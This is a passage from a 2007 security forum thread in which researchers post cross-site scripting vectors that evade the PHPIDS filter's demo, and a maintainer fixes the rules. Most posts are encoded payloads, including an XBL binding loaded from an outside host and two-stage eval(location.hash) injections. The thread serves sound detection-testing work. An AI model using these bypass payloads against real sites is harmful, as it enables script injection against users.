Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...89101112131415161718...LastNext
Current Page: 13 of 31
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Gareth Heyes
Date: November 24, 2007 10:27AM

<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Reiners
Date: November 24, 2007 01:09PM

nice work, gareth!

btw there is a small false postive with "something' something not", like
Reiners' Weblog is not up to date

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Anonymous User
Date: November 25, 2007 04:03PM

@Gareth: fixed - and I heard Giorgio is working on it too. I removed the crappy converter method and forged a rule upgrade.

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Anonymous User
Date: November 25, 2007 04:36PM

hehe, wow I really had to wrap my retarded brain around that one! good stuff!

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Anonymous User
Date: November 25, 2007 04:46PM

@Reiners: Hmmmm - as a matter of fact that false alert pointed directly on a pretty fundamental problem with the attribute breaker detection. I fixed it amongst other stuff - I am pretty curious how the new rule performs. The tests were playing a little bit crazy....

10x!!

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Gareth Heyes
Date: December 09, 2007 05:10AM

&#x5C&#x75&#x30&#x30&#x36&#x31lert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Gareth Heyes
Date: December 09, 2007 08:08AM

<a href=&#x64&#x61&#x74&#x61&#x3Atext/html;&#x62&#x61&#x73&#x65&#x36&#x34,&#x50&#x48&#x4E&#x6A&#x63&#x6D&#x6C&#x77&#x64&#x44&#x35&#x68&#x62&#x47&#x56&#x79&#x64&#x43&#x67&#x76&#x53&#x47&#x46&#x6A&#x61&#x33&#x5A&#x6C&#x63&#x6E&#x52&#x76&#x63&#x69&#x42&#x72&#x61&#x57&#x4E&#x72&#x63&#x79&#x42&#x68&#x63&#x33&#x4D&#x68&#x4C&#x79&#x6B&#x38&#x4C&#x33&#x4E&#x6A&#x63&#x6D&#x6C&#x77&#x64&#x44&#x34&#x3D>test</a>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Anonymous User
Date: December 09, 2007 10:57AM

Brilliant as usual and fixed ;)

Thx!

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Gareth Heyes
Date: December 12, 2007 08:06AM

Tiny vector of the month goes to me hehe:-
0/alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: thornmaker
Date: December 12, 2007 09:42AM

Awesome Gareth! great find. here are a few modifications on that trick that also work (for at least the next 30 seconds)

http://demo.phpids.org/?test=%27%27/alert(0%29
http://demo.phpids.org/?test=%5b%5d/alert(0%29
http://demo.phpids.org/?test=%22%22/alert(0%29
http://demo.phpids.org/?test=/_//alert(0%29
http://demo.phpids.org/?test=null/alert(0%29
http://demo.phpids.org/?test=%230=%7b%7d/alert(0%29
http://demo.phpids.org/?test=undefined/alert(0%29

all of the above with parenthesis added... e.g.
http://demo.phpids.org/?test=(%22%22)/alert(0%29

like above but with some chaining... e.g.:
http://demo.phpids.org/?test=%22%22/undefined/alert(0%29

chaining also allows other things to be added... e.g.:
http://demo.phpids.org/?test=%22%22/this/alert(0%29
http://demo.phpids.org/?test=%22%22/name/this/undefined/null/alert(0%29

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Anonymous User
Date: December 12, 2007 10:46AM

Needless to say that this stuff is awesome ;)

*fixxed*

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: thornmaker
Date: December 13, 2007 10:53AM

Gareth inspired me to hack on that filter a bit more, resulting in:

http://demo.phpids.org/?test=%24%62%3D%2F%78%2F%3F%27%61%73%68%27%3A%61%0A%24%62%3D%2F%78%2F%3F%27%69%6F%6E%2E%68%27%2B%24%62%3A%61%0A%24%62%3D%2F%78%2F%3F%27%6C%6F%63%61%74%27%2B%24%62%3A%61%0A%24%61%3D%21%2F%78%2F%3F%2F%78%2F%3A%65%76%61%6C%2C%61%3D%24%61%0A%61%28%61%28%24%62%29%0A%29#0=%7b%7d;alert%28%27two%20stage%20injection%20ftw!%20%20thanks%20to%20the%20comma%27%29

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: thornmaker
Date: December 13, 2007 03:42PM

taking a cue from .mario's haiku for today ( http://sla.ckers.org/forum/read.php?2,15812,page=4#msg-18263 ), i came up with: http://demo.phpids.org/?test=%24%62%3D%21%30%2E%3F%27%61%73%68%27%3A%61%0A%24%62%3D%21%21%21%30%2E%3F%27%69%6F%6E%2E%68%27%2B%24%62%3A%61%0A%24%62%3D%21%21%21%21%21%30%2E%3F%27%6C%6F%63%61%74%27%2B%24%62%3A%61%0A%24%61%3D%21%21%30%2E%3F%21%30%2E%3A%65%76%61%6C%2C%61%3D%24%61%0A%61%28%61%28%24%62%29%0A%29#%30%3D%7B%7D%3B%61%6C%65%72%74%28%27%74%68%65%20%64%6F%6F%72%20%77%61%73%20%68%61%6C%66%20%73%68%75%74%3B%20%62%65%69%6E%67%20%6F%70%70%6F%72%74%75%6E%69%73%74%69%63%2C%20%65%6D%70%68%61%73%69%73%20%63%72%65%70%74%20%69%6E%27%29

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Gareth Heyes
Date: December 13, 2007 04:08PM

Thornmaker too long dude :P

--alert(1)

:D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Gareth Heyes
Date: December 13, 2007 04:14PM

even shorter :)

-alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Gareth Heyes
Date: December 13, 2007 04:19PM

+-alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Anonymous User
Date: December 13, 2007 05:32PM

Phew - just came home from sports and a drink and then this happened :) If that haiku didn't inspire *g*

Needless to say that all issues are fixed. Thanks guys!

Grx,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: thornmaker
Date: December 13, 2007 06:10PM

@Gareth: very nice! but i would like to see a two stage (arbitrary code execution) injection that's shorter than http://sla.ckers.org/forum/read.php?12,8085,page=13#msg-18262 (url-encoding aside)

@.mario: i never would have guessed you had such an inner muse :)

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: thornmaker
Date: December 13, 2007 08:46PM

this is much more challenging and entertaining than sudokus...
http://demo.phpids.org/?test=%61%3D%2F%78%2F%0A%24%62%3D%21%21%31%65%31%3F%27%61%73%68%27%3A%61%0A%24%62%3D%21%21%31%65%31%3F%27%69%6F%6E%2E%68%27%2B%24%62%3A%61%0A%24%62%3D%21%21%31%65%31%3F%27%6C%6F%63%61%74%27%2B%24%62%3A%61%0A%24%61%3D%21%31%65%31%3F%21%31%65%31%3A%65%76%61%6C%0A%61%2E%61%3D%24%61%0A%24%62%3D%61%2E%61%28%24%62%29%0A%24%62%3D%61%2E%61%28%24%62%29#%30%3D%7B%7D%3B%61%6C%65%72%74%28%27%44%65%62%75%67%67%69%6E%67%20%69%73%20%74%77%69%63%65%20%61%73%20%68%61%72%64%20%61%73%20%77%72%69%74%69%6E%67%20%74%68%65%20%63%6F%64%65%20%69%6E%20%74%68%65%20%66%69%72%73%74%20%70%6C%61%63%65%2E%20%54%68%65%72%65%66%6F%72%65%2C%20%69%66%20%79%6F%75%20%77%72%69%74%65%20%74%68%65%20%63%6F%64%65%20%61%73%20%63%6C%65%76%65%72%6C%79%20%61%73%20%70%6F%73%73%69%62%6C%65%2C%20%79%6F%75%20%61%72%65%2C%20%62%79%20%64%65%66%69%6E%69%74%69%6F%6E%2C%20%6E%6F%74%20%73%6D%61%72%74%20%65%6E%6F%75%67%68%20%74%6F%20%64%65%62%75%67%20%69%74%2E%20%2D%2D%42%72%69%61%6E%20%57%2E%20%4B%65%72%6E%69%67%68%61%6E%27%29

[edit:]
for brevity's (and Garth's) sake, this one is similar but just does the alert: http://demo.phpids.org/?test=a=!1?!1:alert%0aa(0%29

and if you don't want to click the link:

a=!1?!1:alert
a(0)



Edited 2 time(s). Last edit at 12/13/2007 08:57PM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: thornmaker
Date: December 13, 2007 10:08PM

like above, but uses a new way to set the eval function as a variable: http://demo.phpids.org/?test=%78%3D%2F%78%2F%0A%24%78%3D%21%21%31%3F%27%61%73%68%27%3A%78%78%0A%24%78%3D%21%21%31%3F%27%61%74%69%6F%6E%2E%68%27%2B%24%78%3A%78%78%0A%24%78%3D%21%21%31%3F%27%6C%6F%63%27%2B%24%78%3A%78%78%0A%78%2E%78%3D%27%27%2E%20%65%76%61%6C%2C%0A%78%2E%78%28%78%2E%78%28%24%78%29%0A%29#%30%3D%7B%7D%3B%61%6C%65%72%74%28%22%53%6F%6D%65%20%70%65%6F%70%6C%65%2C%20%77%68%65%6E%20%63%6F%6E%66%72%6F%6E%74%65%64%20%77%69%74%68%20%61%20%70%72%6F%62%6C%65%6D%2C%20%74%68%69%6E%6B%20%27%49%20%6B%6E%6F%77%2C%20%49%27%6C%6C%20%75%73%65%20%72%65%67%75%6C%61%72%20%65%78%70%72%65%73%73%69%6F%6E%73%27%2E%20%4E%6F%77%20%74%68%65%79%20%68%61%76%65%20%74%77%6F%20%70%72%6F%62%6C%65%6D%73%2E%20%20%20%2D%20%4A%61%6D%69%65%20%5A%61%77%69%6E%73%6B%69%22%29

@.mario: the quote isn't directed at you, nor anyone else in particular; i just thought it was funny

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Gareth Heyes
Date: December 14, 2007 03:15AM

Hehe cool work Thornmaker! :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Anonymous User
Date: December 14, 2007 04:06AM

Yes - indeed! I commented it on the list.

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: thornmaker
Date: December 14, 2007 10:34AM

small bug in the filter you just added...
http://demo.phpids.org/?test=%73%3D%2F%73%2F%0A%24%73%3D%2D%31%3F%27%61%73%68%27%3A%61%0A%24%73%3D%2D%31%3F%27%61%74%69%6F%6E%2E%68%27%2B%24%73%3A%61%0A%24%73%3D%2D%31%3F%27%6C%6F%63%27%2B%24%73%3A%61%0A%73%2E%73%3D%21%2D%31%3F%2D%31%3A%65%76%61%6C%0A%73%2E%73%28%73%2E%73%28%24%73%29%0A%29#%30%3D%7B%7D%3B%61%6C%65%72%74%28%27%64%69%64%20%79%6F%75%20%6D%65%61%6E%20%5C%5C%73%3F%27%29

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Anonymous User
Date: December 14, 2007 02:53PM

Actually two bugs :-/

10x!

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: thornmaker
Date: December 14, 2007 05:01PM

that's not the filter i had in mind... so what's (?:\+[^s:]+:[^s=]+=) supposed to detect? It's the start of "Detects common concatenation patterns 2/2". The s's are confusing me

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: tx
Date: December 14, 2007 05:25PM

I'm still working on my regex prowess but I believe that is

+{any character except 's' or ':'}:{any character except 's' or '='}=

Example:
+a:b=

or to give a better example

+$b:a
$b=
and
+$b:a
$a=
in
a=/x/
$b=!!1e1?'ash':a
$b=!!1e1?'ion.h'+$b:a
$b=!!1e1?'locat'+$b:a
$a=!1e1?!1e1:eval
a.a=$a
$b=a.a($b)
$b=a.a($b)

@.mario: why [^s], btw?

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 12/14/2007 05:33PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: thornmaker
Date: December 14, 2007 11:29PM

tx: your regex analysis correct. i intended my question to be more like yours... why let s through but not any other letters?

anyhow... http://demo.phpids.org/?test=%73%3D%2F%78%2F%0A%24%73%3D%2E%31%3F%27%65%76%27%3A%61%0A%24%73%3D%2E%30%3F%2E%31%3A%20%24%73%2B%27%61%6C%28%6C%6F%63%27%0A%24%73%3D%2E%30%3F%2E%31%3A%20%24%73%2B%27%61%74%69%6F%6E%2E%68%27%0A%24%73%3D%2E%30%3F%2E%31%3A%20%24%73%2B%27%61%73%68%29%20%27%0A%73%2E%73%3D%27%27%2E%20%65%76%61%6C%0A%73%2E%73%28%24%73%29#%30%3D%7B%7D%3B%61%6C%65%72%74%28%27%54%68%65%72%65%20%69%73%20%6E%6F%20%73%70%6F%6F%6E%2E%27%29

brought to you by the letter s

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: thornmaker
Date: December 15, 2007 12:37AM

a few more alerts...
http://demo.phpids.org/?test=x=.0?/x/:alert%0ax(0%29
http://demo.phpids.org/?test=x=''?/x/:alert%0ax(0%29
http://demo.phpids.org/?test=x=!%7b%7d?/x/:alert%0ax(0%29
http://demo.phpids.org/?test=x=!%5b%5d?/x/:alert%0ax(0%29
http://demo.phpids.org/?test=x=(0%29?/x/:alert%0ax(0%29
http://demo.phpids.org/?test=x=!/x/?/x/:alert%0ax(0%29
http://demo.phpids.org/?test=x=!%230=%7b%7d?/x/:alert%0ax(0%29
http://demo.phpids.org/?test=x=!disableExternalCapture?/x/:alert%0ax(0%29

[edit:] corrected the incorrect url encodings...



Edited 2 time(s). Last edit at 12/15/2007 12:50AM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: DoctorDan
Date: December 15, 2007 08:10PM

A few alerts here:
http://demo.phpids.org/?test=x=(0%29%3f%7b%7d:alert%0ax(1%29
http://demo.phpids.org/?test=x%3D%21/%5C%5C/%3F%7B%7D%3Aalert%0ax(1%29
and I believe all of thornmaker's other ways of saying false in the ternary work with mine as well.
Thornmaker, perhaps the s issue is supposed to be \s which denotes a whitespace character. That's my guess...

-Dan



Edited 5 time(s). Last edit at 12/15/2007 08:31PM by DoctorDan.

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: thornmaker
Date: December 16, 2007 09:07AM

Good stuff DoctorDan. There is apparently some flexibility with the second argument (out of three) of the ternary operator as well.

Here's an alternate way to concatenate: http://p42.us/phpids/32.html . The centrifuge filter kept me from having more than 3 concatenation lines, so the vector evals name rather than location.hash. The actual vector is:

x.a=1&&'ev'
x.a+=!false&&'al(na'
x.a+=/x/&&'me)'
x.x=true&&''.eval
x.x(x.a)

[edit:] cleaned up wording



Edited 3 time(s). Last edit at 12/16/2007 09:12AM by thornmaker.

Options: ReplyQuote
Pages: PreviousFirst...89101112131415161718...LastNext
Current Page: 13 of 31


Sorry, only registered users may post in this forum.